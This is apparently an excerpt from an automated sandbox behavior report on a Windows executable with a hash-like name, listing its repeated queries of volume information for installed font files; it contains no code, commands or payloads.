Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
